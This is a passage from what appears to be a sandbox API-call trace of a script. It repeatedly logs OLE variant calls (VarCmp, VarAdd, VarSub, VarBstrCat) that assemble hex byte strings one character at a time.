(pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.579] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.580] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.580] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.580] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.580] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.580] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.580] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.580] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.580] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.580] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.580] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.580] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.580] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.580] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.580] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.580] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.581] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.581] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.581] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.581] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.581] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.581] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.581] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.581] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.582] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.582] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.582] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.582] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.582] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.582] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.582] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.582] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.583] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.583] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.583] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.583] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.583] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.583] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.583] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.583] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.583] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.584] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.584] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.584] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.584] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.584] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.584] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.584] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.585] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.585] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.585] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.585] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.585] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.585] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.585] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.585] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.585] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.585] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.585] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.585] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.585] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.585] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.585] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.586] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.586] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.586] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.586] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.586] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.586] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.586] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.586] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.586] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.586] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.586] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.586] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.586] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.586] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.586] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.586] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.586] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.587] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.587] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.587] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.587] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.587] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.587] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.587] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.587] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.587] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.587] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.587] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.587] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.587] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.587] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.587] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.587] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.587] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.587] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.588] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.588] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.588] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.588] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.588] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.588] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.588] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.588] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.588] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.588] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.588] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.588] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.588] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.588] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.588] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.589] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.589] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.589] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.589] VarBstrCat (in: bstrLeft="&Ha", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.589] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.589] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.589] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.589] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.589] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.589] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.589] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.589] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.589] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.589] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.589] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.589] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.590] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.590] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.590] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.590] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.590] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.590] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.590] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.590] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.590] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.590] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.590] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.590] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.590] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.590] VarBstrCat (in: bstrLeft="&He", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.590] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.590] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.590] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.591] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.591] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.591] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.591] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.591] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.591] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.591] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.591] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.591] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.591] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.591] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.592] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.592] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.592] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.592] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.592] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.592] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.592] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.592] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.593] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.593] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.593] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.593] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.593] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.593] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.593] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.593] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.593] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.593] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.593] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.593] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.593] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 